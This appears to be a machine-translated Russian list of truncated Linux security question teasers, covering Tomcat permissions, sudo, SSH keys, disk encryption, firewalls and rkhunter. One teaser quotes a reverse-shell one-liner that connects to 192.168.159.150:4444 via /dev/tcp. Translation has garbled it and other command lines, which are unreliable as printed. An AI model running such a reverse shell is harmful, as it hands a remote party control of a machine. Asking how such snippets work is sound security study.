У меня есть Centos 7 с установленным Tomcat и пользователь tomcat ls -l / var / lib / tomcat
всего 0
drwxrwxrwx. 5 root tomcat 84 3 июля 13:18 webapps SELinux применяет принудительное исполнение и веб-приложение Java, которое пытается ...
Начиная с этого замечательного сценария, предложенного Даниэлем Азуелосом cd / Volumes / suspicious_USB / usr / bin / sudo find. -atime -21 -exec ls -dluT {} \; Как можно изменить его, чтобы узнать, подключен ли USB-накопитель ...
Я видел пару похожих тем, но они относятся к переменным без кавычек, что, как я знаю, может привести к нежелательным результатам. Я видел этот код и задавался вопросом, можно ли ввести ...
Мне не нравится вводить пароль для sudo, поэтому я отключил его с помощью% sudo ALL = (ALL) NOPASSWD: ALL Теперь у меня плохая сторона эффект, что любой сценарий оболочки, который я запускаю, может незаметно выполнять sudo от моего имени. ...
В настоящее время я пишу сценарий bash, который использует inotifywait для выполнения определенных действий с пользовательским списком файлов и каталогов. Мне стало известно, что в отличие от многих инструментов оболочки, ...
В течение некоторого времени (введено в версию 1.3, на мой взгляд), модуль iptables может отслеживать два виртуальных состояния, SNAT и DNAT: SNAT Виртуальное состояние, совпадающее, если исходный адрес источника отличается
...
Мне нравится OpenSSH, и я знаю, что каталог / etc / ssh предназначен для демона ssh и ~ / .ssh каталог предназначен для конкретного пользователя. Оба каталога содержат закрытые и открытые ключи: Но что ...
Я заинтересован в настройке моего компьютера с полным шифрованием диска, и, как я понимаю, раздел / boot - единственная сложная часть процесса. А именно, я могу зашифровать раздел / boot и ...
Предположим, я установил в качестве пароля что-то очень простое, например букву «а», так что все, у кого есть доступ к приглашению на вход, фактически имеет root-доступ. Какие атаки меня это открывает, как ...
Какой элегантный способ проверить, остановлен/неактивен ли брандмауэр на компьютерах с redhat 7? пример: мы останавливаем брандмауэр: systemctl status firewalld.service и мой подход к проверке брандмауэра ...
Итак, я только что установил и запустил rkhunter, который показывает мне зеленые OKs / Not founds для всего, кроме: /usr/bin/lwp-request, например: /usr/bin/lwp-request [ Warning ...
есть ли способ перечислить или установить обновления безопасности только с помощью apt ? если я перечисляю обновления с помощью: apt list --upgradable, могу ли я видеть, не зная пакетов и библиотек, какие обновления актуальны ...
Я и мой друг администрируем изрядное количество виртуальных машин, каждая из которых предназначена для выполнения некоторой задачи в общей системе. Когда нам нужно их администрировать, мы обычно входим в систему как root, поскольку ...
При использовании Linux, я проводил некоторые исследования по анонимизации моего трафика с помощью различных инструментов. Однако меня немного смущают все инструменты, которые мне следует использовать. Вот некоторые из них, которые я сейчас использую:
.
Как я могу создать зашифрованное USB-устройство хранения данных, к которому можно будет получить доступ в любой системе, если оно создано в Linux, с использованием cryptsetup, dm-crypt или подобных программ которые могут создавать зашифрованные контейнер
Для производства Debian сжимают сервер, каковы лучшие практики или рекомендации для обработки обновлений системы защиты? Я видел различные статьи о способном к крону, apticron, необслуживаемых обновлениях, способном кроне...
Я пытаюсь определить, заметны ли в Linux переменные среды для процесса другими (некорневыми) пользователями. Непосредственный вариант использования помещает секреты в переменные среды. Это...
Я хочу добавить скрипт для пользователя самбы и пароля. Я видел решения, аналогичные приведенному здесь. Передача пароля по конвейеру для smbpasswd echo -ne "$ PASS \ n $ PASS \ n" | smbpasswd -a -s $ LOGIN, но ...
Я провожу небольшое исследование безопасности, и я был интересно, как следующий фрагмент работает в ОС на базе Unix: exec 5 <> / dev / tcp / 192.168.159.150 / 4444; кот <& 5 | пока читаем строку; do \ $ line 2> ...
У меня есть удаленный сервер, и я получил электронное письмо о 90% потреблении полосы пропускания использование. Итак, я зашел на сервер, проверил и заметил, что на сервере запущен gnome-terminal, которого у меня нет ...
В моей локальной сети я использую сервер PFSense с одним DHCP-сервером. Мне нужно заблокировать второй DHCP-сервер, появляющийся в моей локальной сети. Я думаю, что могу использовать брандмауэр PfSense для запрета IP-адреса второго DHCP-сервера...
Я провожу аудит безопасности и наткнулся на эту утилиту, работающую в моей системе Debian. (Debian 3.16.36-1 + deb8u1) Мне кажется, что подобное программное обеспечение не следует устанавливать на ...
Я думаю, что предыдущее повторение этого вопроса было немного похоже на ковровую бомбу вопросов, так, чтобы, возможно, выключил людей к нему (на грани того, чтобы почти быть отмеченным для удаления), таким образом, я буду...
Я рассмотрел другой аналогичный вопрос о добавлении сторонних репозиториев. Я пытаюсь добавить сторонний клиент обмена мгновенными сообщениями для настольных ПК под названием riot. Хотя сайт дает ссылку на сторонний сайт, он не дает ...
Я размещаю веб-приложение на Ubuntu 16.04.
Все компоненты этого приложения находятся внутри контейнеров Docker, большинство из них должны общаться только между собой, но не с внешним миром (например, PostgreSQL ...
Я работаю над Linux Mint 18.1 и GNU / Linux Debian 9 Stretch (тестирование). У меня доступен только IPv4. Я хотел бы повысить безопасность своей сети, я прочитал это: «Блокировать известные TCP-атаки». ...
Вы никогда не должны вставлять данные из Интернета в свой терминал. Вместо этого вы должны вставить в текстовый редактор, проверить команду и затем вставить в терминал. Это нормально, но что, если Vim - мой текстовый редактор? Может ...
Я должен предоставить некоторую поддержку пользователям для определенного программного обеспечения. Поскольку оказание поддержки по электронной почте утомительно, я хотел бы получить временный доступ к учетной записи пользователя. Позвоните пользователю
Я делаю резервные копии своих файлов на внешний жесткий диск. Я хочу регулярно создавать резервные копии и защищать их на случай, если кто-то украдет мой внешний HDD. Я хотел бы сделать скрипты, которые будут создавать защищенные архивы резервных копий, с
У меня нет файла конфигурации, и каждый хост, к которому я подключаюсь, кажется, что ssh просматривает все ключи, пока не найдет правильный. Безопасно ли отправлять ключ на хост, который потенциально ...